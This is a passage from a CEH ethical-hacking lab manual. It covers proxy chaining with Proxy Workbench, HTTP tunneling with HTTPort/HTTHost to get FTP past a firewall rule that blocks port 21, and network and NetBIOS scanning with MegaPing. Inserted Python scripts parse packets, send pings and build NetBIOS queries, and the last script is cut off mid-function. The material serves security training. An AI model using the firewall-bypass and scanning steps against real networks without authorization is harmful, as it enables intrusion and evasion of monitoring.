23. Check the To column; it is forwarding the traffic to 10.0.0.3 (the Windows Server 2008 virtual machine).

Proxy Workbench changes this. Not only is it an awesome proxy server, but you can see all of the data flowing through it, visually display a socket connection history and save it to HTML.

[Figure: Proxy Workbench on the Windows Server 2012 host. Under HTTP Proxy - Web (8080) the To column reads 10.0.0.3:8080 for every forwarded request, and the real-time data pane shows the raw request headers of the browsed pages.]

FIGURE 13.11: Proxy Workbench generated traffic in Windows Server 2012 host machine

24. Now log in to the Windows Server 2008 virtual machine, and check the To column; it is forwarding the traffic to 10.0.0.7 (the Windows 7 virtual machine).

And now Proxy Workbench includes connection failure simulation strategies. What this means is that you can simulate a poor network, a slow Internet connection or an unresponsive server. This makes it the definitive TCP application tester.

[Figure: Proxy Workbench on the Windows Server 2008 virtual machine (Monitoring ... (10.0.0.3)). Under HTTP Proxy - Web (8080) every connection is listed From 10.0.0.6:98xx To 10.0.0.7:8080, protocol HTTP; the real-time data pane shows response headers such as Expires, Last-Modified, Cache-Control: max-age=360... and Connection: keep-alive.]

FIGURE 13.12: Proxy Workbench generated traffic in Windows Server 2008 virtual machine


25. In the Windows 7 virtual machine, select On the web server, connect to port 80, and click OK.

It allows you to "see" how your email client communicates with the email server, how web pages are delivered to your browser, and why your FTP client is not connecting to its server.

[Figure: HTTP Properties window on Windows 7, General tab: "On the web server, connect to port:" selected; "Connect via another proxy" cleared, with its Proxy server and Port fields greyed out.]

FIGURE 13.13: Configuring HTTP properties in Windows 7

26. Now check the traffic in 10.0.0.7 (the Windows 7 virtual machine); the To column shows the traffic going to the different websites browsed from Windows Server 2012 through the chain.

In the Connection Tree, if a protocol or a client/server pair is selected, the Details Pane displays the summary information of all of the socket connections that are in progress for the selected item on the Connection Tree.

[Figure: Proxy Workbench on the Windows 7 virtual machine (10.0.0.7). The Connection Tree lists 10.0.0.3 to each browsed web server; the Details for HTTP Proxy - Web (8080) show From 10.0.0.3:322xx and To the web servers on port 80 (for example 157.166.226.x:80), protocol HTTP, with bytes sent and received; the real-time data pane shows the raw request headers (Accept-Language, Date, Connection).]
ISL
F IG U R E 13.14: P r o s y W o rk b e n c h G e n e ra te d T ra ffic in W in d o w s 7 V ir tu a l M a c h in e

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

CEH Lab Manual Page 219 Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Module 03 - Scanning Networks

Tool/Utility: Proxy Workbench
Information Collected/Objectives Achieved:
    Proxy server used: 10.0.0.7
    Port scanned: 8080
    Result: Traffic captured by Windows 7 virtual machine (10.0.0.7)

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. Examine the Connection Failure - Termination and Refusal.

2. Evaluate how real-time logging records everything in Proxy Workbench.

Internet Connection Required

☑ Yes ☐ No

Platform Supported

☑ Classroom ☐ iLabs


HTTP Tunneling Using HTTPort

HTTPort is a program from HTTHost that makes a transparent tunnel through a proxy server or firewall.

ICON KEY
Valuable information
Test your knowledge
Web exercise
Workbook review

Lab Scenario

Attackers are always on the hunt for clients that can be easily compromised, and they can enter these networks with IP spoofing to damage or steal data. The attacker can get packets through a firewall by spoofing the IP address. If attackers are able to capture network traffic, as you have learned to do in the previous lab, they can perform Trojan attacks, registry attacks, password hijacking attacks, etc., which can prove to be disastrous for an organization's network. An attacker may use a network probe to capture raw packet data and then use this raw packet data to retrieve packet information such as source and destination IP address, source and destination ports, flags, header length, checksum, Time to Live (TTL), and protocol type.

Therefore, as a network administrator you should be able to identify attacks by extracting information from captured traffic such as source and destination IP addresses, protocol type, header length, source and destination ports, etc. and compare these details with modeled attack signatures to determine if an attack has occurred. You can also check the attack logs for the list of attacks and take evasive actions.

Also, you should be familiar with the HTTP tunneling technique, by which you can identify additional security risks that may not be readily visible by conducting simple network and vulnerability scanning, and determine the extent to which a network IDS can identify malicious traffic within a communication channel. In this lab you will learn HTTP tunneling using HTTPort.
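The header extraction and signature comparison described above, as an added Python example that is not part of the lab manual: it decodes the IPv4 and TCP fields the scenario lists from a raw packet, verifies the IPv4 checksum, and matches the result against two modeled signatures drawn from this lab's setup (an outbound FTP control connection, and non-HTTP data on TCP/80). The packets, both signatures and the function names (parse_packet, match_signatures, build_tcp_packet) are constructed for illustration; the TCP checksum is not computed.

```python
"""Extract IPv4/TCP header fields from a raw packet and compare them with
modeled signatures.  Added example, not from the CEH lab manual; the
packets, the two signatures and all function names are constructed."""
import struct
from ipaddress import IPv4Address

TCP_FLAG_NAMES = ("FIN", "SYN", "RST", "PSH", "ACK", "URG")  # bit order, low to high
HTTP_METHODS = (b"GET ", b"POST ", b"HEAD ", b"PUT ", b"DELETE ", b"OPTIONS ", b"CONNECT ")


def ipv4_checksum(header: bytes) -> int:
    """RFC 791 one's-complement sum over a header whose checksum field is zero."""
    if len(header) % 2:
        header += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(header) // 2), header))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_packet(raw: bytes) -> dict:
    """Return the fields the lab lists: addresses, ports, flags, header
    lengths, checksum, TTL and protocol.  Raises ValueError on junk input."""
    if len(raw) < 20:
        raise ValueError("truncated IPv4 header")
    ver_ihl, _tos, _tlen, _id, _frag, ttl, proto, csum, src, dst = struct.unpack(
        "!BBHHHBBH4s4s", raw[:20])
    if ver_ihl >> 4 != 4:
        raise ValueError("not an IPv4 packet")
    ihl = (ver_ihl & 0x0F) * 4
    if ihl < 20 or len(raw) < ihl:
        raise ValueError("bad IP header length")
    # Recompute the checksum with the checksum field zeroed; a mismatch
    # means the header was corrupted or tampered with in transit.
    zeroed = raw[:10] + b"\x00\x00" + raw[12:ihl]
    fields = {
        "src_ip": str(IPv4Address(src)), "dst_ip": str(IPv4Address(dst)),
        "ttl": ttl, "protocol": proto, "ip_header_len": ihl,
        "ip_checksum": csum, "ip_checksum_ok": ipv4_checksum(zeroed) == csum,
    }
    if proto == 6:  # TCP
        if len(raw) < ihl + 20:
            raise ValueError("truncated TCP header")
        sport, dport, _seq, _ack, off_flags = struct.unpack("!HHIIH", raw[ihl:ihl + 14])
        data_off = (off_flags >> 12) * 4
        fields.update({
            "src_port": sport, "dst_port": dport, "tcp_header_len": data_off,
            "flags": {n for i, n in enumerate(TCP_FLAG_NAMES) if off_flags & (1 << i)},
            "payload": raw[ihl + data_off:],
        })
    return fields


# Modeled signatures: every listed field must equal the captured value, a
# "flags" entry must be a subset of the captured flags, and "payload_test"
# is a predicate over the TCP payload.  Both rules follow this lab's setup.
SIGNATURES = [
    {"name": "outbound FTP control connection (blocked by lab policy)",
     "protocol": 6, "dst_port": 21, "flags": {"SYN"}},
    {"name": "non-HTTP data on TCP/80 (possible tunnel)",
     "protocol": 6, "dst_port": 80,
     "payload_test": lambda p: bool(p) and not p.startswith(HTTP_METHODS)},
]


def match_signatures(fields: dict, signatures=SIGNATURES) -> list:
    """Names of the signatures whose constraints all hold for one packet."""
    hits = []
    for sig in signatures:
        for key, want in sig.items():
            if key == "name":
                continue
            if key == "payload_test":
                ok = want(fields.get("payload", b""))
            elif key == "flags":
                ok = want <= fields.get("flags", set())
            else:
                ok = fields.get(key) == want
            if not ok:
                break
        else:  # no constraint failed
            hits.append(sig["name"])
    return hits


def build_tcp_packet(src, dst, sport, dport, flags, payload=b"", ttl=64) -> bytes:
    """Constructed sample packet: IPv4 checksum filled in, TCP checksum left 0."""
    tcp = struct.pack("!HHIIHHHH", sport, dport, 1, 0, (5 << 12) | flags, 8192, 0, 0) + payload
    ip = struct.pack("!BBHHHBBH4s4s", 0x45, 0, 20 + len(tcp), 1, 0, ttl, 6, 0,
                     IPv4Address(src).packed, IPv4Address(dst).packed)
    return ip[:10] + struct.pack("!H", ipv4_checksum(ip)) + ip[12:] + tcp


if __name__ == "__main__":
    # Constructed: a SYN from the host machine toward an FTP server.
    pkt = build_tcp_packet("10.0.0.7", "10.0.0.4", 49152, 21, 0x02)
    info = parse_packet(pkt)
    print({k: v for k, v in info.items() if k != "payload"})
    print("matches:", match_signatures(info))
```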

Lab Objectives

This lab will show you how networks can be scanned and how to use HTTPort and HTTHost.

Lab Environment

In the lab, you need the HTTPort tool.


■ HTTPort is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort

■ You can also download the latest version of HTTPort from the link http://www.targeted.org/

■ If you decide to download the latest version, then screenshots shown in the lab might differ

■ Install HTTHost on Windows Server 2008 Virtual Machine

■ Install HTTPort on Windows Server 2012 Host Machine

■ Follow the wizard-driven installation steps and install it.

■ Administrative privileges are required to run this tool

■ This lab might not work if the remote server filters/blocks HTTP tunneling packets

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

Lab Duration

Time: 20 Minutes

Overview of HTTPort

HTTPort creates a transparent tunnel through a proxy server or firewall. HTTPort allows using all sorts of Internet software from behind the proxy. It bypasses HTTPS and HTTP proxies, firewalls, and transparent accelerators.

Lab Tasks

TASK 1: Stopping IIS Services

1. Before running the tool you need to stop the IIS Admin Service and World Wide Web Publishing services on the Windows Server 2008 virtual machine.

2. Go to Administrative Privileges > Services > IIS Admin Service, right-click and click the Stop option.

HTTPort creates a transparent tunnel through a proxy server or firewall. This allows you to use all sorts of Internet software from behind the proxy.


[Screenshot: Services console on Windows Server 2008 with the IIS Admin Service selected and its context menu open on the Stop option]

FIGURE 14.1: Stopping IIS Admin Service in Windows Server 2008

3. Go to Administrative Privileges > Services > World Wide Web Publishing Services, right-click and click the Stop option.

It bypasses HTTPS and HTTP proxies, transparent accelerators, and firewalls. It has a built-in SOCKS4 server.

[Screenshot: Services console on Windows Server 2008 with the World Wide Web Publishing Service selected and its context menu open on the Stop option]

FIGURE 14.2: Stopping World Wide Web Services in Windows Server 2008

4. Open Mapped Network Drive "CEH-Tools" Z:\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTHost

5. Open the HTTHost folder and double-click htthost.exe.

6. The HTTHost wizard will open; select the Options tab.

7. On the Options tab, set all the settings to default except the Personal Password field, which should be filled in with any other password. In this lab, the personal password is "magic".

It supports strong traffic encryption, which makes proxy logging useless, and supports NTLM and other authentication schemes.


8. Check the Revalidate DNS names and Log Connections options and click Apply.

[Screenshot: HTTHost 1.8.5 Options tab. Network: Bind listening to 0.0.0.0, Port 80; Bind external to 0.0.0.0; Allow access from 0.0.0.0; Personal password. Pass through unrecognized requests to: Host name or IP 127.0.0.1, Port 81; Original IP header field X-Original-IP. Max. local buffer and Timeouts left at default; Revalidate DNS names and Log connections checked; Apply button. Tabs: Statistics, Application log, Options, Security, Send a Gift]

FIGURE 14.3: HTTHost Options tab

To set up HTTPort you need to point your browser to 127.0.0.1.

9. Now leave HTTHost intact, and don't turn off the Windows Server 2008 Virtual Machine.

10. Now switch to the Windows Server 2012 Host Machine, and install HTTPort from D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Tunneling Tools\HTTPort and double-click httport3snfm.exe

11. Follow the wizard-driven installation steps.

12. Launch the Start menu by hovering the mouse cursor in the lower-left corner of the desktop.

HTTPort goes with the predefined mapping "External HTTP proxy" of local port

FIGURE 14.4: Windows Server 2012 - Desktop view

13. Click the HTTPort 3.SNFM app to open the HTTPort 3.SNFM window.


[Screenshot: Windows Server 2012 Start screen (Administrator) showing the installed apps, including HTTPort 3.SNFM, Proxy Workbench and MegaPing]

FIGURE 14.5: Windows Server 2012 - Apps

14. The HTTPort 3.SNFM window appears as shown in the figure that follows.

[Screenshot: HTTPort 3.SNFM main window, Proxy tab. Tabs: System, Proxy, Port mapping, About, Register. HTTP proxy to bypass (blank = direct or firewall): Host name or IP address, Port; Proxy requires authentication: Username, Password. Misc. options: User-Agent IE 6.0, Bypass mode. Use personal remote host at (blank = use public): Host name or IP address, Port, Password. Start button]

FIGURE 14.6: HTTPort Main Window

For each piece of software, create a custom mapping given all the addresses from which it operates. For applications that dynamically change their ports there is the Socks4-proxy mode, in which the software will create a local Socks server (127.0.0.1).

15. Select the Proxy tab and enter the host name or IP address of the targeted machine.

16. Here as an example: enter the Windows Server 2008 virtual machine IP address, and enter Port number 80.

17. You cannot set the Username and Password fields.

18. In the Use personal remote host at section, click Start and then Stop, and then enter the targeted Host machine IP address and port, which should be 80.


19. Here any password could be used. Here as an example: enter the password as "magic".

In a real world environment, people sometimes use a password protected proxy to make company employees able to access the Internet.

[Screenshot: HTTPort 3.SNFM Proxy tab. HTTP proxy to bypass: Host name or IP address 10.0.0.4, Port 80; Proxy requires authentication unchecked. Misc. options: User-Agent IE 6.0, Bypass mode Remote host. Use personal remote host at: Host name or IP address 10.0.0.4, Port 80, Password masked]

FIGURE 14.7: HTTPort Proxy settings window

20. Select the Port Mapping tab and click Add to create a New Mapping.

[Screenshot: HTTPort 3.SNFM Port mapping tab. Static TCP/IP port mappings (tunnels): New mapping with nodes Local port 0, Remote host remote.host.name, Remote port 0. Select a mapping to see statistics: No stats - select a mapping; LEDs. Built-in SOCKS4 server: Run SOCKS server (port 1080) checked; Available in "Remote Host" mode: Full SOCKS4 support (BIND)]

HTTHost supports registration, but it is free and password-free: you will be issued a unique ID, with which you can contact the support team and ask your questions.

FIGURE 14.8: HTTPort creating a New Mapping

21. Select the New Mapping node, right-click New Mapping, and click Edit.


[Screenshot: HTTPort 3.SNFM Port mapping tab with the context menu of the New mapping node open, showing Add, Edit and Remove]

FIGURE 14.9: HTTPort Editing to assign a mapping

22. Rename this to ftp certified hacker, and select the Local port node; then right-click, click Edit and enter the Port value 21.

23. Now right-click on the Remote host node to Edit and rename it as ftp.certifiedhacker.com

24. Now right-click on the Remote port node to Edit and enter the port value 21.

[Screenshot: HTTPort 3.SNFM Port mapping tab. Static TCP/IP port mappings (tunnels): ftp certified hacker with Local port 21, Remote host ftp.certifiedhacker.com, Remote port 21. No stats - inactive. Built-in SOCKS4 server: Run SOCKS server (port 1080); Full SOCKS4 support (BIND)]

In this kind of environment, the federated search web part of Microsoft Search Server 2008 will not work out-of-the-box because we only support a non-password protected proxy.

FIGURE 14.10: HTTPort Static TCP/IP port mapping

25. Click Start on the Proxy tab of HTTPort to run the HTTP tunneling.


[Screenshot: HTTPort 3.SNFM Proxy tab with HTTP proxy to bypass 10.0.0.4 port 80, Bypass mode Remote host, personal remote host 10.0.0.4 port 80 with masked password, and the Start button]

HTTP is the basis for Web surfing, so if you can freely surf the Web from where you are, HTTPort will bring you the rest of the Internet applications.

FIGURE 14.11: HTTPort to start tunneling

26. Now switch to the Windows Server 2008 virtual machine and click the Application log tab.

27. Check the last line; if the Listener is listening at 0.0.0.0:80, then it is running properly.

[Screenshot: HTTHost 1.8.5 Application log]

    MAIN: HTTHOST 1.8.5 PERSONAL GIFTWARE DEMO starting
    MAIN: Project codename: 99 red balloons
    MAIN: Written by Dmitry Dvoinikov
    MAIN: (c) 1999-2004, Dmitry Dvoinikov
    MAIN: 64 total available connection(s)
    MAIN: network started
    MAIN: RSA keys initialized
    MAIN: loading security filters...
    MAIN: loaded filter "grant.dll" (allows all connections within
    MAIN: loaded filter "block.dll" (denies all connections withir
    MAIN: done, total 2 filter(s) loaded
    MAIN: using transfer encoding: PrimeScrambler64/SevenTe
    grant.dll: filters conections
    block.dll: filters conections
    LISTENER: listening at 0.0.0.0:80

To make a data tunnel through the password protected proxy, so we can map an external web site to a local port, and federate the search result.

FIGURE 14.12: HTTHost Application log section

28. Now switch to the Windows Server 2012 host machine and turn ON the Windows Firewall.

29. Go to Windows Firewall with Advanced Security.


30. Select Outbound Rules from the left pane of the window, and then click New Rule in the right pane of the window.

[Screenshot: Windows Firewall with Advanced Security, Outbound Rules view listing the BranchCache and Core Networking rules, with New Rule... in the Actions pane]

FIGURE 14.13: Windows Firewall with Advanced Security window in Windows Server 2008

31. In the New Outbound Rule Wizard, select the Port option in the Rule Type section and click Next.

[Screenshot: New Outbound Rule Wizard, Rule Type step. Options: Program, Port (selected), Predefined (BranchCache - Content Retrieval (Uses HTTP)), Custom; Back, Next, Cancel]

Tools demonstrated in this lab are available in Z:\ Mapped Network Drive in Virtual Machines

FIGURE 14.14: Windows Firewall selecting a Rule Type


32. Now select All remote ports in the Protocol and Ports section, and click Next.

[Screenshot: New Outbound Rule Wizard, Protocol and Ports step. Does this rule apply to TCP or UDP? TCP selected. Does this rule apply to all remote ports or specific remote ports? All remote ports selected; Specific remote ports (Example: 80, 443, 5000-5010)]

HTTPort doesn't really care for the proxy as such; it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through.

FIGURE 14.15: Windows Firewall assigning Protocols and Ports

33. In the Action section, select the Block the connection option and click Next.

You need to install htthost on a PC that is generally accessible on the Internet, typically your "home" PC. This means that if you started a Web server on the home PC, everyone else must be able to connect to it. There are two showstoppers for htthost on home PCs

[Screenshot: New Outbound Rule Wizard, Action step. Options: Allow the connection; Allow the connection if it is secure; Block the connection (selected)]


FIGURE 14.16: Windows Firewall setting an Action

34. In the Profile section, select all three options. The rule will apply to: Domain, Public, Private, and then click Next.

NAT/firewall issues: You need to enable an incoming port. For HTThost it will typically be 80 (http) or 443 (https), but any port can be used - IF the HTTP proxy at work supports it - some proxies are configured to allow only 80 and 443.

[Screenshot: New Outbound Rule Wizard, Profile step. When does this rule apply? Domain, Private and Public all checked]

FIGURE 14.17: Windows Firewall Profile settings

35. Type Port 21 Blocked in the Name field, and click Finish.

[Screenshot: New Outbound Rule Wizard, Name step. Name: Port 21 Blocked; Description (optional) empty; Back, Finish, Cancel]

The default TCP port for FTP connection is port 21. Sometimes the local Internet Service Provider blocks this port and this will result in FTP


F IG U R E 14.18: W in d o w s F ire w a ll assig n in g a n am e to P o e t

3 6 . T h e n e w m le Port 21 B locked is c r e a t e d a s s h o w n i n d i e f o l l o w i n g f i g u r e .

[Screenshot: Windows Firewall with Advanced Security, Outbound Rules view, with the new rule Port 21 Blocked listed above the BranchCache and Core Networking rules]

HTTPort doesn't really care for the proxy as such: it works perfectly with firewalls, transparent accelerators, NATs and basically anything that lets the HTTP protocol through.

FIGURE 14.19: Windows Firewall New rule

37. Right-click the newly created rule and select Properties.

[Screenshot: Windows Firewall with Advanced Security, context menu of the rule Port 21 Blocked showing Disable Rule, Cut, Copy, Delete, Properties and Help, with Properties highlighted]

HTTPort then intercepts that connection and runs it through a tunnel through the proxy.

FIGURE 14.20: Windows Firewall new rule properties

38. Select the Protocols and Ports tab. Change the Remote Port option to Specific Ports and enter the Port number as 21.

39. Leave the other settings as their defaults and click Apply, then click OK.

HTTPort enables you to bypass your HTTP proxy in case it blocks you from the Internet.


[Screenshot: Port 21 Blocked Properties, Protocols and Ports tab: Protocol type and Protocol number as chosen in the wizard, Local port All Ports, Remote port Specific Ports with 21 entered, ICMP settings Customize button]

With HTTPort, you can use various Internet software from behind the proxy, e.g., e-mail, instant messengers, P2P file sharing, ICQ, News, FTP, IRC etc. The basic idea is that you set up your Internet software

FIGURE 14.21: Firewall Port 21 Blocked Properties

40. Type ftp ftp.certifiedhacker.com in the command prompt and press Enter. The connection is blocked in Windows Server 2008 by the firewall.

HTTPort neither freezes nor hangs. What you are experiencing is known as "blocking operations".

FIGURE 14.22: ftp connection is blocked

41. Now open the command prompt on the Windows Server 2012 host machine, type ftp 127.0.0.1 and press Enter.

HTTPort makes it possible to open the client side of a TCP/IP connection and provide it to any software. The keywords here are "client" and "any software".


FIGURE 14.23: Executing ftp command

Lab Analysis

Document all the IP addresses, open ports and running applications, and protocols you discovered during the lab.

Tool/Utility: HTTPort
Information Collected/Objectives Achieved:
  Proxy server Used: 10.0.0.4
  Port scanned: 80
  Result: ftp 127.0.0.1 connected to 127.0.0.1

PLEASE TALK TO YOUR INSTRUCTOR IF YOU HAVE QUESTIONS RELATED TO THIS LAB.

Questions

1. How do you set up HTTPort to use an email client (Outlook, Messenger, etc.)?

2. Examine if software does not allow editing the address to connect to.

Internet Connection Required

☑ Yes ☐ No

Platform Supported

☑ Classroom ☐ iLabs


Basic Network Troubleshooting Using MegaPing

MegaPing is an ultimate toolkit that provides complete essential utilities for information system administrators and IT solution providers.

Lab Scenario

You have learned in the previous lab that HTTP tunneling is a technique where communications of other network protocols are encapsulated inside the HTTP protocol. For a company to exist on the Internet, it requires a web server. These web servers prove to be a high data value target for attackers. The attacker usually exploits the WWW server running IIS and gains command line access to the system. Once a connection has been established, the attacker uploads a precompiled version of the HTTP tunnel server (hts). With the hts server set up, the attacker then starts a client on his or her system and directs its traffic to the SRC port of the system running the hts server. This hts process listens on port 80 of the WWW host and redirects traffic. The hts process wraps the traffic in HTTP headers and forwards it to the WWW server port 80, after which the attacker tries to log in to the system; once access is gained he or she sets up additional tools to further exploit the network.

MegaPing security scanner checks your network for potential vulnerabilities that might be used to attack your network, and saves information in security reports. In this lab you will learn to use MegaPing to check for vulnerabilities and troubleshoot issues.

Lab Objectives

This lab gives an insight into pinging a destination address list. It teaches how to:

■ Ping a destination address list
■ Traceroute
■ Perform NetBIOS scanning


Lab Environment

To carry out the lab, you need:

■ MegaPing is located at D:\CEH-Tools\CEHv8 Module 03 Scanning Networks\Scanning Tools\MegaPing
■ You can also download the latest version of MegaPing from the link http://www.magnetosoft.com/
■ If you decide to download the latest version, then screenshots shown in the lab might differ
■ Administrative privileges to run tools
■ TCP/IP settings correctly configured and an accessible DNS server
■ This lab will work in the CEH lab environment, on Windows Server 2012, Windows 2008, and Windows 7

Tools demonstrated in this lab are available in D:\CEH-Tools\CEHv8 Module 03 Scanning Networks

PING is commonly expanded as Packet Internet Groper; this is a backronym, the utility was named after the sonar ping.

Lab Duration

Time: 10 Minutes

Overview of Ping

The ping command sends Internet Control Message Protocol (ICMP) echo request packets to the target host and waits for the ICMP echo reply. During this request-response process, ping measures the time from transmission to reception, known as the round-trip time, and records any lost packets. A host that does not answer is not necessarily down: many firewalls drop ICMP echo requests, which is why scanners fall back to TCP or ARP probes for host discovery.
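The following Python script is an added example (it is not part of the lab manual and not MegaPing code) that shows what ping actually puts on the wire: it builds an ICMP echo request with the RFC 1071 checksum, validates and parses the echo reply, and derives the round-trip time from a timestamp carried in the payload. The `echo_reply_for` function stands in for the target host so the whole exchange can be exercised offline; `ping()` performs the real exchange over a raw socket, which needs administrator/root privileges. The payload filler text is an assumption for illustration.

```python
import os
import socket
import struct
import time

ICMP_ECHO_REQUEST = 8
ICMP_ECHO_REPLY = 0


def inet_checksum(data: bytes) -> int:
    """RFC 1071 checksum: one's-complement sum of 16-bit big-endian words, odd tail zero-padded."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold the carries back into the low 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def build_echo_request(ident: int, seq: int, payload: bytes) -> bytes:
    """Echo request: type 8, code 0, checksum, identifier, sequence number, payload."""
    header = struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, 0, ident, seq)
    csum = inet_checksum(header + payload)   # computed with the checksum field zeroed
    return struct.pack("!BBHHH", ICMP_ECHO_REQUEST, 0, csum, ident, seq) + payload


def echo_reply_for(request: bytes) -> bytes:
    """Stand-in for the target host: a reply is type 0 with the same identifier, sequence and payload."""
    _, _, _, ident, seq = struct.unpack("!BBHHH", request[:8])
    payload = request[8:]
    header = struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, 0, ident, seq)
    return struct.pack("!BBHHH", ICMP_ECHO_REPLY, 0, inet_checksum(header + payload), ident, seq) + payload


def parse_echo_reply(packet: bytes, expect_ident: int):
    """Return (seq, payload) for a valid echo reply addressed to our identifier, else None.
    Raw sockets hand back the IPv4 header too, so strip it when present (version nibble 4, IHL in words)."""
    if len(packet) >= 20 and packet[0] >> 4 == 4:
        packet = packet[(packet[0] & 0x0F) * 4:]
    if len(packet) < 8 or inet_checksum(packet) != 0:   # a valid message sums to zero incl. its checksum
        return None
    itype, code, _, ident, seq = struct.unpack("!BBHHH", packet[:8])
    if itype != ICMP_ECHO_REPLY or code != 0 or ident != expect_ident:
        return None
    return seq, packet[8:]


def rtt_ms(reply_payload: bytes, received_at: float) -> float:
    """Round-trip time in ms; the request carried its send time as a big-endian double in the payload."""
    sent_at = struct.unpack("!d", reply_payload[:8])[0]
    return (received_at - sent_at) * 1000.0


def ping(host: str, count: int = 4, timeout: float = 1.0) -> dict:
    """Live ping over a raw socket (administrator/root required). Returns sent/received/loss and RTTs."""
    ident = os.getpid() & 0xFFFF
    dest = socket.gethostbyname(host)
    rtts = []
    with socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_ICMP) as s:
        s.settimeout(timeout)
        for seq in range(1, count + 1):
            payload = struct.pack("!d", time.time()) + b"lab-ping"   # assumed filler text
            s.sendto(build_echo_request(ident, seq, payload), (dest, 0))
            try:
                data, _ = s.recvfrom(1024)
            except socket.timeout:
                continue                     # no reply within the timeout: counted as loss
            parsed = parse_echo_reply(data, ident)
            if parsed and parsed[0] == seq:
                rtts.append(rtt_ms(parsed[1], time.time()))
    return {"sent": count, "received": len(rtts),
            "loss_pct": 100.0 * (count - len(rtts)) / count, "rtt_ms": rtts}


if __name__ == "__main__":
    req = build_echo_request(ident=0x1234, seq=1, payload=struct.pack("!d", time.time()) + b"lab-ping")
    seq, payload = parse_echo_reply(echo_reply_for(req), 0x1234)
    print("reply seq", seq, "rtt %.3f ms" % rtt_ms(payload, time.time()))
```

The identifier/sequence check matters in practice: on a busy host several processes may ping at once and the kernel delivers every ICMP message to every raw socket, so a reply is only "ours" if the identifier matches what we sent.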

Lab Tasks

TASK 1: IP Scanning

1. Launch the Start menu by hovering the mouse cursor on the lower-left corner of the desktop.

FIGURE 13.1: Windows Server 2012 - Desktop view

2. Click the MegaPing app to open the MegaPing window.


FIGURE 15.2: Windows Server 2012 - Apps

3. The MegaPing main window appears as shown in the following figure.


[Screenshot: MegaPing (Unregistered) main window. The left pane lists the tools: DNS List Hosts, DNS Lookup Name, Finger, Network Time, Ping, Traceroute, Whois, Network Resources, Process Info, System Info, IP Scanner, NetBIOS Scanner, Share Scanner, Security Scanner, Port Scanner, Host Monitor]

All scanners can scan individual computers, any range of IP addresses, domains, and selected types of computers inside domains.

FIGURE 15.3: MegaPing main window

4. Select any one of the options from the left pane of the window.

5. Select IP Scanner, and type in the IP range in the From and To fields; in this lab the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.

6. You can select the IP range depending on your network.

Security Scanner provides the following information: NetBIOS names, configuration info, open TCP and UDP ports, transports, shares, users, groups, services, drivers, local drives, sessions, remote time of day, printers.


[Screenshot: MegaPing IP Scanner tab with Range selected and 10.0.0.1 to 10.0.0.254 entered in the From and To fields, Start button]

FIGURE 15.4: MegaPing IP Scanning

7. It will list all the IP addresses in that range with their TTL (Time to Live), Status (dead or alive), and the statistics of the dead and alive hosts. The TTL column is also a rough operating system hint: Windows hosts reply with an initial TTL of 128 and most Linux systems with 64, decremented once per router hop, so a host answering with 54 is a different platform from (or farther away than) the hosts answering with 128.

[Screenshot: MegaPing IP Scanner results for 10.0.0.1 to 10.0.0.254. Alive hosts: 10.0.0.1 (TTL 54), 10.0.0.4, 10.0.0.6 and 10.0.0.7 (TTL 128); the remaining addresses report Destination unreachable. Hosts Stats: Total 254, Active 4, Failed 250. Option: Show MAC Addresses]

Network utilities: DNS List Hosts, DNS Lookup Name, Network Time Synchronizer, Ping, Traceroute, Whois, and Finger.

FIGURE 15.5: MegaPing IP Scanning Report

TASK 2: NetBIOS Scanning

8. Select the NetBIOS Scanner from the left pane and type in the IP range in the From and To fields. In this lab, the IP range is from 10.0.0.1 to 10.0.0.254. Click Start.


[Screenshot: MegaPing NetBIOS Scanner tab with Range 10.0.0.1 to 10.0.0.254 entered]

MegaPing can scan your entire network and provide information such as open shared resources, open ports, services/drivers active on the computer, key registry entries, users and groups, trusted domains, printers, and more.

FIGURE 15.6: MegaPing NetBIOS Scanning

more.
9. The NetBIOS scan will list all the hosts with their NetBIOS names and adapter addresses.
[Screenshot: MegaPing NetBIOS Scanner results. Each alive host (10.0.0.4, 10.0.0.6 ADMIN-PC, 10.0.0.7) expands into its NetBIOS Names, Adapter Address (MAC, vendor Microsoft) and Domain WORKGROUP; Hosts Stats show Active 3]

Scan results can be saved in HTML or TXT reports, which can be used to secure your network, for example by shutting down unnecessary ports, closing shares, etc.

FIGURE 15.7: MegaPing NetBIOS Scanning Report
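Steps 8 and 9 show the NetBIOS Scanner output: names and adapter addresses per host. As an added example, not taken from the lab manual or from MegaPing, the Python script below builds the UDP/137 node status (NBSTAT) query such scanners send for the wildcard name `*` and parses the response into the name table and the adapter's MAC address (the UNIT_ID field), following RFC 1001/1002. The sample response bytes, the host name LABHOST, the workgroup WORKGROUP and the MAC 00-11-22-33-44-55 are constructed for the demonstration; `nbstat_query()` sends the same request to a live host whose IP you supply.

```python
import os
import socket
import struct

NBSTAT = 0x0021          # node status record type (RFC 1002, section 4.2.17)
# Well-known 16th-byte suffixes, as shown in nbtstat / NetBIOS scanner output
NB_SUFFIXES = {0x00: "Workstation Service", 0x03: "Messenger Service", 0x1B: "Domain Master Browser",
               0x1C: "Domain Controllers", 0x1D: "Master Browser", 0x1E: "Browser Service Elections",
               0x20: "File Server Service"}


def encode_nb_name(name16: bytes) -> bytes:
    """RFC 1001 first-level encoding: each nibble becomes a letter A..P; 32-char label, zero-terminated."""
    if len(name16) != 16:
        raise ValueError("NetBIOS name must be exactly 16 bytes")
    letters = bytes(0x41 + n for b in name16 for n in (b >> 4, b & 0x0F))
    return b"\x20" + letters + b"\x00"


def build_nbstat_request(txid: int) -> bytes:
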